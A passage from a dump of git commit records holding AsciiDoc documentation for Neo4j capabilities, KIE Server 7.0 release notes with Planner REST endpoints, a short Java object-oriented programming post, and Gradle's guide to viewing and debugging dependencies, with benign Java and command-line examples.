\n\n[[capabilities-periodic-synchronization]]\n=== Periodic Synchronization ===\n\nAnother viable scenario is the periodic export of the latest changes in the RDBMS to \nNeo4j via some form of SQL query.\nThis allows a small amount of latency in the synchronization, but has the advantage of using the RDBMS as the master for all data purposes.\nThe same process can be applied with Neo4j as the master data source.\n\n[[capabilities-full-export]]\n=== Periodic Full Export\/Import of Data ===\n\nUsing the Batch Inserter tools for Neo4j, even large amounts of data can be imported \ninto the database in very short times.\nThus, a full export from the RDBMS and import into Neo4j becomes possible.\nIf the propagation lag between the RDBMS and Neo4j is not a big issue, this is a very viable solution.\n\n[[capabilities-availability]]\n== Availability and Reliability ==\n\nMost mission-critical systems require the database subsystem to be accessible at all \ntimes.\nNeo4j ensures availability and reliability through a few different strategies.\n\n[[capabilities-op-availability]]\n=== Operational Availability ===\n\nIn order not to create a single point of failure, Neo4j supports different \napproaches which provide transparent fallback and\/or recovery from failures.\n\n==== Online backup (Cold spare) ====\n\nIn this approach, a single instance of the master database is used, with Online \nBackup enabled.\nIn case of a failure, the backup files can be mounted onto a new \nNeo4j instance and reintegrated into the application.\n\n==== Online Backup High Availability (Hot spare) ====\n\nHere, a Neo4j \"backup\" instance listens to online transfers of changes from the \nmaster.\nIn the event of a failure of the master, the backup is already running \nand can directly take over the load.\n\n==== High Availability cluster ====\n\nThis approach uses a cluster of database instances, with one (read\/write) master \nand a number of (read-only) slaves.\nFailing slaves can simply be restarted and brought back online.\nAlternatively, a new slave may be added by cloning an existing one.\nShould the master instance fail, a new master will be elected by the remaining \ncluster nodes.\n\n[[capabilities-disaster]]\n=== Disaster Recovery \/ Resiliency ===\n\nIn the case of a breakdown of a major part of the IT infrastructure, there need to be \nmechanisms in place that enable the fast recovery and regrouping of the remaining \nservices and servers.\nIn Neo4j, there are different components that are suitable to be part of a disaster recovery strategy.\n\n==== Prevention ====\n\n* Online Backup High Availability to other locations outside the current data center.\n* Online Backup to different file system locations: this is a simpler form of backup, \napplying changes directly to backup files; it is thus more suited for local backup scenarios.\n* Neo4j High Availability cluster: a cluster of one write-master Neo4j server and a number of read-slaves, getting transaction logs from the master.\n Write-master failover is handled by quorum election among the 
read-slaves for a new master.\n\n==== Detection ====\n\n* SNMP and JMX monitoring can be used for the Neo4j database.\n\n==== Correction ====\n\n* Online Backup: A new Neo4j server can be started directly on the backed-up files \nand take over new requests.\n* Neo4j High Availability cluster: A broken Neo4j read slave can be reinserted into the cluster, getting the latest updates from the master.\n Alternatively, a new server can be inserted by copying an existing server and applying the latest updates to it.\n\n[[capabilities-capacity]]\n== Capacity ==\n\n[[capabilities-file-sizes]]\n=== File Sizes ===\n\nNeo4j relies on Java's Non-blocking I\/O subsystem for all file handling.\nFurthermore, while the storage file layout is optimized for interconnected data, Neo4j does not require raw devices.\nThus, file sizes are only limited by the underlying operating system's capacity to handle large files.\nPhysically, there is no built-in limit of the file handling capacity in Neo4j.\n\nNeo4j tries to memory-map as much of the underlying store files as possible.\nIf the available RAM is not sufficient to keep all data in RAM, Neo4j will use buffers in some cases, reallocating the memory-mapped high-performance I\/O windows to the regions with the most I\/O activity dynamically.\nThus, ACID speed degrades gracefully as RAM becomes the limiting factor.\n\n[[capabilities-read-speed]]\n=== Read speed ===\n\nEnterprises want to optimize the use of hardware to deliver the maximum business value \nfrom available resources.\nNeo4j's approach to reading data provides the best possible usage of all available hardware resources.\nNeo4j does not block or lock any read operations; thus, there is no danger of deadlocks in read operations and no need for read transactions.\nWith threaded read access to the database, queries can be run simultaneously on as many processors as may be available.\nThis provides very good scale-up scenarios with bigger servers.\n\n[[capabilities-write-speed]]\n=== Write speed ===\n\nWrite speed is a consideration for many enterprise applications.\nHowever, there are two different scenarios:\n\n. sustained continuous operation and\n. bulk access (e.g., backup, initial or batch loading).\n\nTo support the disparate requirements of these scenarios, Neo4j supports two modes of writing to the storage layer.\n\nIn transactional, ACID-compliant normal operation, isolation level is maintained and \nread operations can occur at the same time as the writing process.\nAt every commit, the data is persisted to disk and can be recovered to a consistent state upon system failures.\nThis requires disk write access and a real flushing of data.\nThus, the write speed of Neo4j on a single server in continuous mode is limited by the I\/O capacity of the hardware.\nConsequently, the use of fast SSDs is highly recommended for production scenarios.\n\nNeo4j has a Batch Inserter that operates directly on the store files.\nThis mode does not provide transactional security, so it can only be used when there is a single write thread.\nBecause data is written sequentially, and never flushed to the logical logs, huge performance boosts are achieved.\nThe Batch Inserter is optimized for non-transactional bulk import of large amounts of data. 
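\n\nAs a sketch of what Batch Inserter usage looks like - the store directory and the data are placeholders, and the exact factory methods vary between Neo4j versions (this follows the 3.x API) - consider:\n\n[source,java]\n----\nimport java.io.File;\nimport java.util.HashMap;\nimport java.util.Map;\n\nimport org.neo4j.graphdb.Label;\nimport org.neo4j.graphdb.RelationshipType;\nimport org.neo4j.unsafe.batchinsert.BatchInserter;\nimport org.neo4j.unsafe.batchinsert.BatchInserters;\n\npublic class BulkImport {\n\n    public static void main(String[] args) throws Exception {\n        \/\/ Writes directly to the store files: no transactions, and only\n        \/\/ a single thread may use the inserter.\n        BatchInserter inserter = BatchInserters.inserter(new File(\"data\/example-db\"));\n        try {\n            Map<String, Object> properties = new HashMap<>();\n            properties.put(\"name\", \"Alice\");\n            long alice = inserter.createNode(properties, Label.label(\"Person\"));\n            properties.put(\"name\", \"Bob\");\n            long bob = inserter.createNode(properties, Label.label(\"Person\"));\n            inserter.createRelationship(alice, bob,\n                    RelationshipType.withName(\"KNOWS\"), null);\n        } finally {\n            \/\/ shutdown() flushes everything to the store files.\n            inserter.shutdown();\n        }\n    }\n}\n----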
\n\n[[capabilities-data-size]]\n=== Data size ===\n\nIn Neo4j, data size is mainly limited by the address space of the primary keys for Nodes, Relationships, Properties and RelationshipTypes.\nCurrently, the address space is as follows:\n\n|=========\n| nodes | 2^35^ (∼ 34 billion) \n| relationships | 2^35^ (∼ 34 billion) \n| properties | 2^36^ to 2^38^ depending on property types (maximum ∼ 274 billion, always at least ∼ 68 billion)\n| relationship types | 2^15^ (∼ 32 000)\n|=========\n\n","old_contents":"[[capabilities]]\nCapabilities\n============\n\n\/\/\/\/\/\/\/\/\/\nDetails, originally contained in the capabilities document.\n\/\/\/\/\/\/\/\/\/\n\n[[capabilities-data-security]]\n== Data Security ==\n\nSome data may need to be protected from unauthorized access (e.g., theft, modification). \nNeo4j does not deal with data encryption explicitly, but supports all means built into the Java programming language and the JVM to protect data by encrypting it before storing.\n\nFurthermore, data can be easily secured by running on an encrypted datastore at the file system level.\nFinally, data protection should be considered in the upper layers of the surrounding system in order to prevent problems with scraping, malicious data insertion, and other threats.\n\n[[capabilities-data-integrity]]\n== Data Integrity ==\n\nIn order to keep data consistent, there needs to be mechanisms and structures that guarantee the integrity of all stored data.\nIn Neo4j, data integrity is maintained for the core graph engine together with other data sources - see below.\n\n[[capabilities-core-graph-engine]]\n=== Core Graph Engine ===\n\nIn Neo4j, the whole data model is stored as a graph on disk and persisted as \npart of every committed transaction.\nIn the storage layer, Relationships, Nodes, and Properties have direct pointers to each other.\nThis maintains integrity without the need for data duplication between the different backend store files.\n \n[[capabilities-different-data-sources]]\n=== Different Data Sources ===\n\nIn a number of scenarios, the core graph engine is combined with other systems \nin order to achieve optimal performance for non-graph lookups.\nFor example, Apache Lucene is frequently used as an additional index system for text queries that would otherwise be very processing-intensive in the graph layer.\n\nTo keep these external systems in synchronization with each other, Neo4j provides \nfull Two Phase Commit transaction management, with rollback support over all data \nsources.\nThus, failed index insertions into Lucene can be transparently rolled back in all data sources and thus keep data up-to-date.\n\n[[capabilities-data-integration]]\n== Data Integration ==\n\nMost enterprises rely primarily on relational databases to store their data, but \nthis may cause performance limitations.\nIn some of these cases, Neo4j can be used as an extension to supplement search\/lookup for faster decision making.\nHowever, in any situation where multiple data repositories contain the same data, synchronization can be an issue.\n\nIn some applications, it is acceptable for the search platform to be slightly out \nof sync with the relational database.\nIn others, tight data integrity (eg., between Neo4j and RDBMS) is necessary. 
\nTypically, this has to be addressed for data changing in real-time and for bulk data changes happening in the RDBMS.\n\nA few strategies for synchronizing integrated data follows.\n\n[[capabilities-event-based-synchronization]]\n=== Event-based Synchronization ===\n\nIn this scenario, all data stores, both RDBMS and Neo4j, are fed with domain-specific \nevents via an event bus.\nThus, the data held in the different backends is not actually synchronized but rather replicated.\n\n[[capabilities-periodic-synchronization]]\n=== Periodic Synchronization ===\n\nAnother viable scenario is the periodic export of the latest changes in the RDBMS to \nNeo4j via some form of SQL query.\nThis allows a small amount of latency in the synchronization, but has the advantage of using the RDBMS as the master for all data purposes.\nThe same process can be applied with Neo4j as the master data source.\n\n[[capabilities-full-export]]\n=== Periodic Full Export\/Import of Data ===\n\nUsing the Batch Inserter tools for Neo4j, even large amounts of data can be imported \ninto the database in very short times.\nThus, a full export from the RDBMS and import into Neo4j becomes possible.\nIf the propagation lag between the RDBMS and Neo4j is not a big issue, this is a very viable solution.\n\n[[capabilities-availability]]\n== Availability and Reliability ==\n\nMost mission-critical systems require the database subsystem to be accessible at all \ntimes.\nNeo4j ensures availability and reliability through a few different strategies. \n\n[[capabilities-op-availability]]\n=== Operational Availability ===\n\nIn order not to create a single point of failure, Neo4j supports different \napproaches which provide transparent fallback and\/or recovery from failures.\n\n==== Online backup (Cold spare) ====\n\nIn this approach, a single instance of the master database is used, with Online \nBackup enabled.\nIn case of a failure, the backup files can be mounted onto a new \nNeo4j instance and reintegrated into the application.\n\n==== Online Backup High Availability (Hot spare) ====\n\nHere, a Neo4j \"backup\" instance listens to online transfers of changes from the \nmaster.\nIn the event of a failure of the master, the backup is already running \nand can directly take over the load.\n\n==== High Availability cluster ====\n\nThis approach uses a cluster of database instances, with one (read\/write) master \nand a number of (read-only) slaves.\nFailing slaves can simply be restarted and brought back online.\nAlternatively, a new slave may be added by cloning an existing one.\nShould the master instance fail, a new master will be elected by the remaining \ncluster nodes.\n\n[[capabilities-disaster]]\n=== Disaster Recovery\/ Resiliency ===\n\nIn cases of a breakdown of major part of the IT infrastructure, there need to be \nmechanisms in place that enable the fast recovery and regrouping of the remaining \nservices and servers.\nIn Neo4j, there are different components that are suitable to be part of a disaster recovery strategy.\n\n==== Prevention ====\n\n* Online Backup High Availability to other locations outside the current data center.\n* Online Backup to different file system locations: this is a simpler form of backup, \napplying changes directly to backup files; it is thus more suited for local backup scenarios.\n* Neo4j High Availability cluster: a cluster of one write-master Neo4j server and a number of read-slaves, getting transaction logs from the master.\n Write-master failover is handled by quorum election among the 
read-slaves for a new master.\n\n==== Detection ====\n\n* SNMP and JMX monitoring can be used for the Neo4j database.\n\n==== Correction ====\n\n* Online Backup: A new Neo4j server can be started directly on the backed-up files \nand take over new requests.\n* Neo4j High Availability cluster: A broken Neo4j read slave can be reinserted into the cluster, getting the latest updates from the master.\n Alternatively, a new server can be inserted by copying an existing server and applying the latest updates to it.\n\n[[capabilities-capacity]]\n== Capacity ==\n\n[[capabilities-file-sizes]]\n=== File Sizes ===\n\nNeo4j relies on Java's Non-blocking I\/O subsystem for all file handling.\nFurthermore, while the storage file layout is optimized for interconnected data, Neo4j does not require raw devices.\nThus, filesizes are only limited by the underlying operating system's capacity to handle large files.\nPhysically, there is no built-in limit of the file handling capacity in Neo4j.\n\nNeo4j tries to memory-map as much of the underlying store files as possible.\nIf the available RAM is not sufficient to keep all data in RAM, Neo4j will use buffers in some cases, reallocating the memory-mapped high-performance I\/O windows to the regions with the most I\/O activity dynamically.\nThus, ACID speed degrades gracefully as RAM becomes the limiting factor.\n\n[[capabilities-read-speed]]\n=== Read speed ===\n\nEnterprises want to optimize the use of hardware to deliver the maximum business value \nfrom available resources.\nNeo4j's approach to reading data provides the best possible usage of all available hardware resources.\nNeo4j does not block or lock any read operations; thus, there is no danger for deadlocks in read operations and no need for read transactions.\nWith a threaded read access to the database, queries can be run simultaneously on as many processors as may be available.\nThis provides very good scale-up scenarios with bigger servers.\n\n[[capabilities-write-speed]]\n=== Write speed ===\n\nWrite speed is a consideration for many enterprise applications.\nHowever, there are two different scenarios:\n\n. sustained continuous operation and\n. bulk access (e.g., backup, initial or batch loading).\n\nTo support the disparate requirements of these scenarios, Neo4j supports two modes of writing to the storage layer.\n\nIn transactional, ACID-compliant normal operation, isolation level is maintained and \nread operations can occur at the same time as the writing process.\nAt every commit, the data is persisted to disk and can be recovered to a consistent state upon system failures.\nThis requires disk write access and a real flushing of data.\nThus, the write speed of Neo4j on a single server in continuous mode is limited by the I\/O capacity of the hardware.\nConsequently, the use of fast SSDs is highly recommended for production scenarios.\n\nNeo4j has a Batch Inserter that operates directly on the store files.\nThis mode does not provide transactional security, so it can only be used when there is a single write thread.\nBecause data is written sequentially, and never flushed to the logical logs, huge performance boosts are achieved.\nThe Batch Inserter is optimized for non-transactional bulk import of large amounts of data. 
\n\n[[capabilities-data-size]]\n=== Data size ===\n\nIn Neo4j, data size is mainly limited by the address space of the primary keys for Nodes, Relationships, Properties and RelationshipTypes.\nCurrently, the address space is as follows:\n\n* 2\u02c635 (~ 34 billion) nodes \n* 2\u02c635 (~ 34 billion) relationships \n* 2\u02c636 (~ 68 billion) properties \n* 2\u02c615 (~ 32 000) relationship types \n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"957e9becc05ec4aefa11b22eef8bdc0dfc1d8b89","subject":"PLANNER-825: Mention OptaPlanner REST API changes in 7.0 release notes","message":"PLANNER-825: Mention OptaPlanner REST API changes in 7.0 release notes\n","repos":"manstis\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs,jomarko\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs","old_file":"docs\/shared-kie-docs\/src\/main\/asciidoc\/KieServer\/ReleaseNotes\/ReleaseNotesKieServer.7.0.0.Final-section.adoc","new_file":"docs\/shared-kie-docs\/src\/main\/asciidoc\/KieServer\/ReleaseNotes\/ReleaseNotesKieServer.7.0.0.Final-section.adoc","new_contents":"[[_kieserver.releasenoteskie.7.0.0]]\n= Breaking changes in Kie Server 7.0 from 6.x\n\n== ServiceResponse XStream marshalling changes\n\nNOTE: This release note applies only when directly interfacing with the Kie Server (kie-server) API, not when using the Kie Server Java Client (kie-server-client) API.\n\nIn an effort to be more consistent with JAXB marshalling, XStream marshalling has undergone the following changes:\n\n- The XML ServiceResponse element's `response` object no longer renders with the canonical name.\n- XStream now uses `type` and `msg` as attributes, not child elements.\n\nFor more details, see https:\/\/issues.jboss.org\/browse\/DROOLS-1509[DROOLS-1509].\n\n== Simplified Planner REST API\n\n=== ServiceResponse wrapper removal\nThe `ServiceResponse` wrapper has been removed from Planner service responses returned by KIE Server.\nThis allows easier processing of the responses on the client side.\n\n[source,xml,options=\"nowrap\"]\n----\n<solver-instance>\n ...\n <status>SOLVING<\/status>\n <score scoreClass=\"org.optaplanner.core.api.score.buildin.hardsoft.HardSoftScore\">0hard\/-10soft<\/score>\n <best-solution class=\"curriculumcourse.curriculumcourse.CourseSchedule\">\n ...\n <\/best-solution>\n<\/solver-instance>\n----\n\n=== New Planner API overview\n\nRegister a solver:\n\n- PUT http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}\n\nSubmit a solution:\n\n- POST http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}\/state\/solving\n\nGet the best solution:\n\n- GET http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}\/bestsolution\n\nTerminate a solver:\n\n- POST http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}\/state\/terminating-early\n\nDispose a solver:\n\n- DELETE http:\/\/${kie-server}\/services\/rest\/server\/containers\/${container_id}\/solvers\/${solver_id}
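\n\nAs an illustration of how these endpoints can be called - the host, port, credentials, container id, solver id and config file path below are all placeholders - a solver could be registered from plain Java with `java.net.HttpURLConnection`:\n\n[source,java]\n----\nimport java.io.OutputStream;\nimport java.net.HttpURLConnection;\nimport java.net.URL;\nimport java.nio.charset.StandardCharsets;\nimport java.util.Base64;\n\npublic class RegisterSolver {\n\n    public static void main(String[] args) throws Exception {\n        URL url = new URL(\"http:\/\/localhost:8080\/kie-server\/services\/rest\/server\"\n                + \"\/containers\/myContainer\/solvers\/mySolver\");\n        HttpURLConnection connection = (HttpURLConnection) url.openConnection();\n        connection.setRequestMethod(\"PUT\");\n        connection.setRequestProperty(\"Content-Type\", \"application\/xml\");\n        connection.setRequestProperty(\"Authorization\", \"Basic \" + Base64.getEncoder()\n                .encodeToString(\"user:password\".getBytes(StandardCharsets.UTF_8)));\n        connection.setDoOutput(true);\n\n        \/\/ Minimal solver-instance payload; the config file path is a placeholder\n        \/\/ for a solver configuration inside the container.\n        String body = \"<solver-instance>\"\n                + \"<solver-config-file>curriculumcourse\/solverConfig.xml<\/solver-config-file>\"\n                + \"<\/solver-instance>\";\n        try (OutputStream out = connection.getOutputStream()) {\n            out.write(body.getBytes(StandardCharsets.UTF_8));\n        }\n        System.out.println(\"HTTP status: \" + connection.getResponseCode());\n    }\n}\n----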
","old_contents":"[[_kieserver.releasenoteskie.7.0.0]]\n= Breaking changes in Kie Server 7.0 from 6.x\n\n== ServiceResponse XStream marshalling changes\n\nNOTE: This release note applies only when directly interfacing with the Kie Server (kie-server) API, not when using the Kie Server Java Client (kie-server-client) API.\n\nIn an effort to be more consistent with JAXB marshalling, XStream marshalling has undergone the following changes:\n\n- The XML ServiceResponse element's `response` object no longer renders with the canonical name.\n- XStream now uses `type` and `msg` as attributes, not child elements.\n\nFor more details, see https:\/\/issues.jboss.org\/browse\/DROOLS-1509[DROOLS-1509].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e77574d07531936a8edbf6dcae8cde6ae7881cc5","subject":"Update 2019-01-31-java-language.adoc","message":"Update 2019-01-31-java-language.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-java-language.adoc","new_file":"_posts\/2019-01-31-java-language.adoc","new_contents":"= The Java Language\n:hp-image: \/covers\/cover.png\n:published_at: 2019-01-31\n:hp-tags: Java,\n:hp-alt-title: java language\n\n== Basics\n=== Object-Oriented Programming Concepts\nCore concepts:\n\n* Objects\n* Messages\n* Classes\n* Inheritance\n\n* Relation to the real world\n* Syntax\n\n==== Objects\nObjects are the key to object-oriented technology. They are commonly used to model real-world things: an object is a software bundle of the related state and behavior of such a thing.\n\n. Understanding the real world\nEvery real-world thing can be broken down into two characteristics: state and behavior. A good way to learn object-oriented programming is to identify the state and behavior of every thing you can think of. You may also notice some complexity: some things can encompass the state and behavior of other things.\n\n. Entering the world of code\nThe state and behavior of real-world things correspond to fields and methods in the world of code; a small sketch follows the list below:\n\n* How state and behavior are represented with objects\n* Data encapsulation\n* The benefits of using objects
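\n\nTo make state, behavior and encapsulation concrete, here is a small illustrative sketch. The `Bicycle` class is a made-up example in the spirit of the official Java tutorials, not code from the original post:\n\n[source,java]\n----\npublic class Bicycle {\n\n    \/\/ State is represented as fields, kept private.\n    private int speed = 0;\n    private int gear = 1;\n\n    \/\/ Behavior is exposed as methods that operate on the internal state.\n    public void speedUp(int increment) {\n        speed += increment;\n    }\n\n    public void changeGear(int newGear) {\n        gear = newGear;\n    }\n\n    \/\/ Other code interacts with the object only through its methods:\n    \/\/ this is data encapsulation.\n    public String describe() {\n        return \"speed=\" + speed + \", gear=\" + gear;\n    }\n}\n----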
\n\n\n\n\n","old_contents":"= Java \u8bed\u8a00\n:hp-image: \/covers\/cover.png\n:published_at: 2019-01-31\n:hp-tags: Java,\n:hp-alt-title: java language\n\n== \u57fa\u7840\n=== \u9762\u5411\u5bf9\u8c61\u7f16\u7a0b\u6982\u5ff5\n\u6838\u5fc3\u6982\u5ff5\uff1a\n\n* \u5bf9\u8c61\n* \u6d88\u606f\uff08messages\uff09\n* \u7c7b\n* \u7ee7\u627f\n\n* \u4e0e\u73b0\u5b9e\u7684\u5173\u8054\n* \u8bed\u6cd5\n\n==== \u5bf9\u8c61\n\u5bf9\u8c61\u5e38\u7528\u4e8e\u5bf9\u73b0\u5b9e\u5b58\u5728\u5efa\u6a21\uff0c\u662f\u5176\u76f8\u5173\u7684\u72b6\u6001\u4e0e\u884c\u4e3a\u7684\u8f6f\u4ef6\u5c01\u88c5\u3002\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5cf0d1079823475da996b8f9868a5a70617aa432","subject":"Remove link to deleted section in docs","message":"Remove link to deleted section in docs\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/dep-man\/01-core-dependency-management\/viewing_debugging_dependencies.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/dep-man\/01-core-dependency-management\/viewing_debugging_dependencies.adoc","new_contents":"[[viewing-debugging-dependencies]]\n[[sec:debugging-build-scans]]\n= View and Debug Dependencies\n\nGradle provides tooling to navigate dependency graphs and mitigate link:https:\/\/en.wikipedia.org\/wiki\/Dependency_hell[dependency hell].\nUsers can render the full graph of dependencies as well as identify the selection reason and origin for a dependency.\nDependencies can originate through build script declared dependencies or transitive dependencies.\nYou can visualize dependencies with:\n\n- the built-in Gradle CLI `dependencies` task\n- the built-in Gradle CLI `dependencyInsight` task\n- link:https:\/\/scans.gradle.com\/[build scans]\n\n[[sec:listing_dependencies]]\n== List Project Dependencies\n\nGradle provides the built-in `dependencies` task to render a dependency tree from the command line.\nBy default, the dependency tree renders dependencies for all <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,configurations>> within a <<command_line_interface#executing_tasks_in_multi_project_builds,single project>>.\nThe dependency tree indicates the selected version of each dependency.\nIt also displays information about dependency conflict resolution.\n\nThe `dependencies` task can be especially helpful for issues related to transitive dependencies.\nYour build file lists direct dependencies, but the `dependencies` task can help you understand which transitive dependencies resolve during your build.\n\n=== Output Annotations\n\nThe `dependencies` task marks dependency trees with the following annotations:\n\n- `(*)`: Indicates repeated occurrences of a transitive dependency subtree. Gradle expands transitive dependency subtrees only once per project; repeat occurrences only display the root of the subtree, followed by this annotation.\n- `(c)`: This element is a <<dependency_constraints.adoc#sec:direct-vs-transitive-deps,dependency constraint>>, not a dependency. 
Look for the matching dependency elsewhere in the tree.\n- `(n)`: A dependency or dependency configuration that <<declaring_dependencies.adoc#sec:resolvable-consumable-configs,cannot be resolved>>.\n\n=== Specify a Dependency Configuration\n\nTo focus on the information about one dependency configuration, provide the optional parameter `--configuration`.\nJust like <<command_line_interface#sec:name_abbreviation, project and task names>>, Gradle accepts abbreviated names to select a dependency configuration.\nFor example, you can specify `tRC` instead of `testRuntimeClasspath` if the pattern matches to a single dependency configuration.\nBoth of the following examples show dependencies in the `testRuntimeClasspath` dependency configuration of a Java project:\n\n----\n> gradle -q dependencies --configuration testRuntimeClasspath\n----\n\n----\n> gradle -q dependencies --configuration tRC\n----\n\nTo see a list of all the configurations available in a project, including those added by any plugins, you can run a `resolvableConfigurations` report.\n\nFor more info, see that plugin's documentation (for instance, the Java Plugin is documented <<java_plugin.adoc#sec:java_plugin_and_dependency_management,here>>).\n\n=== Example\n\nConsider a project that uses the link:https:\/\/www.eclipse.org\/jgit\/[JGit library] to execute Source Control Management (SCM) operations for a release process.\nYou can declare dependencies for external tooling with the help of a <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,custom dependency configuration>>.\nThis avoids polluting other contexts, such as the compilation classpath for your production source code.\n\nThe following example declares a custom dependency configuration named \"scm\" that contains the JGit dependency:\n\n====\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependenciesReport\/groovy\",files=\"build.gradle[tags=dependency-declaration]\"]\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependenciesReport\/kotlin\",files=\"build.gradle.kts[tags=dependency-declaration]\"]\n====\n\n\nUse the following command to view a dependency tree for the `scm` dependency configuration:\n\n----\n> gradle -q dependencies --configuration scm\ninclude::{snippetsPath}\/dependencyManagement\/inspectingDependencies-dependenciesReport\/tests\/dependencyReport.out[]\n----\n\n[[sec:identifying_reason_dependency_selection]]\n== Identify the Dependency Version Selected\n\nA project may request two different versions of the same dependency either directly or transitively.\nGradle applies <<dependency_resolution.adoc#sec:version-conflict,version conflict resolution>> to ensure that only one version of the dependency exists in the dependency graph.\nThe following example introduces a conflict with `commons-codec:commons-codec`, added both as a direct dependency and a transitive dependency of JGit:\n\n====\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/groovy\",files=\"build.gradle[tags=dependency-declaration]\"]\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/kotlin\",files=\"build.gradle.kts[tags=dependency-declaration]\"]\n====\n\nThe dependency tree in a link:https:\/\/scans.gradle.com\/[build scan] shows information about conflicts.\nClick on a dependency and select the \"Required By\" tab to see the selection reason and origin of the 
dependency.\n\nimage::dependency-management-dependency-insight-report-build-scan.png[]\n\n=== Dependency Insights\n\nGradle provides the built-in `dependencyInsight` task to render a _dependency insight report_ from the command line.\nDependency insights provide information about a single dependency within a single <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,configuration>>.\nGiven a dependency, you can identify the selection reason and origin.\n\n`dependencyInsight` accepts the following parameters:\n\n`--dependency <dependency>` (mandatory)::\nThe dependency to investigate.\nYou can supply a complete `group:name`, or part of it.\nIf multiple dependencies match, Gradle generates a report covering all matching dependencies.\n`--configuration <name>` (mandatory)::\nThe dependency configuration which resolves the given dependency.\nThis parameter is optional for projects that use the <<java_plugin#java_plugin, Java plugin>>, since the plugin provides a default value of `compileClasspath`.\n`--single-path` (optional)::\nRender only a single path to the dependency.\n\nThe following code snippet demonstrates how to run a dependency insight report for all paths to a dependency named \"commons-codec\" within the \"scm\" configuration:\n\n----\n> gradle -q dependencyInsight --dependency commons-codec --configuration scm\ninclude::{snippetsPath}\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/tests\/dependencyInsightReport.out[]\n----\n\nFor more information about configurations, see the <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configuration documentation>>.\n\n==== Selection Reasons\n\nThe \"Selection reasons\" section of the dependency insight report lists the reasons why a dependency was selected.\nHave a look at the table below to understand the meaning of the different terms used:\n\n.Terminology\n[%header%autowidth,compact]\n|===\n| Reason | Meaning\n\n| (Absent)\n| No reason other than a reference, direct or transitive, was present.\n\n| Was requested : <text>\n| The dependency appears in the graph, and the inclusion came with a <<declaring_dependencies#sec:documenting-dependencies, `because` text>>.\n\n| Was requested : didn't match versions <versions>\n| The dependency appears with a <<dynamic_versions#sub:declaring_dependency_with_dynamic_version, dynamic version>> which did not include the listed versions.\nMay be followed by a `because` text.\n\n| Was requested : reject version <versions>\n| The dependency appears with a <<rich_versions#rich-version-constraints, rich version>> containing one or more `reject`.\nMay be followed by a `because` text.\n\n| By conflict resolution : between versions <version>\n| The dependency appeared multiple times, with different version requests.\nThis resulted in <<dependency_resolution#sec:version-conflict, conflict resolution>> to select the most appropriate version.\n\n| By constraint\n| A <<dependency_constraints#sec:adding-constraints-transitive-deps, dependency constraint>> participated in the version selection.\nMay be followed by a `because` text.\n\n| By ancestor\n| There is a <<rich_versions#rich-version-constraints, rich version>> with a `strictly` which enforces the version of this dependency.\n\n| Selected by rule\n| A <<resolution_rules#resolution_rules, dependency resolution rule>> overruled the default selection process.\nMay be followed by a `because` text.\n\n| Rejection : <version> by rule because <text>\n| A `ComponentSelection.reject` 
link:{groovyDslPath}\/org.gradle.api.artifacts.ComponentSelection.html#org.gradle.api.artifacts.ComponentSelection:reject(java.lang.String)[rejected the given version] of the dependency.\n\n| Rejection: version <version>: <attributes information>\n| The dependency has a dynamic version and some versions did not match the <<variant_model#sec:variant-aware-matching, requested attributes>>.\n\n| Forced\n| The build enforces the version of the dependency through an enforced platform or resolution strategy.\n|===\n\nIf multiple selection reasons exist, the insight report lists all of them.\n\n== Troubleshooting\n\n[[sec:resolving-version-conflict]]\n=== Version Conflicts\n\nIf the selected version does not match your expectation, Gradle offers a series of tools to help you <<dependency_constraints.adoc#dependency-constraints,control transitive dependencies>>.\n\n[[sec:resolving-variant-aware-errors]]\n=== Variant Selection Errors\n\nSometimes a selection error happens at the <<variant_model.adoc#understanding-variant-selection,variant selection level>>.\nHave a look at the <<variant_model.adoc#sec:variant-select-errors,dedicated section>> to understand these errors and how to resolve them.\n\n[[sub:resolving-unsafe-configuration-resolution-errors]]\n=== Unsafe Configuration Resolution Errors\n\nResolving a configuration can have side effects on Gradle's project model.\nAs a result, Gradle must manage access to each project's configurations.\nThere are a number of ways a configuration might be resolved unsafely.\nFor example:\n\n* A task from one project directly resolves a configuration in another project in the task's action.\n* A task specifies a configuration from another project as an input file collection.\n* A build script for one project resolves a configuration in another project during evaluation.\n* Project configurations are resolved in the settings file.\n\nGradle produces a deprecation warning for each unsafe access.\nUnsafe access can cause indeterminate errors.\nYou should <<command_line_interface.adoc#sec:command_line_warnings,fix unsafe access warnings>> in your build.\n\nIn most cases, you can resolve unsafe accesses by creating a cross-project dependency on the other project.\nSee the documentation for <<cross_project_publications.adoc#cross_project_publications, sharing outputs between projects>> for more information.\n\nIf you find a use case that can't be resolved using these techniques, please let us know by filing a https:\/\/github.com\/gradle\/gradle\/issues[GitHub Issue].\n","old_contents":"[[viewing-debugging-dependencies]]\n[[sec:debugging-build-scans]]\n= View and Debug Dependencies\n\nGradle provides tooling to navigate dependency graphs and mitigate 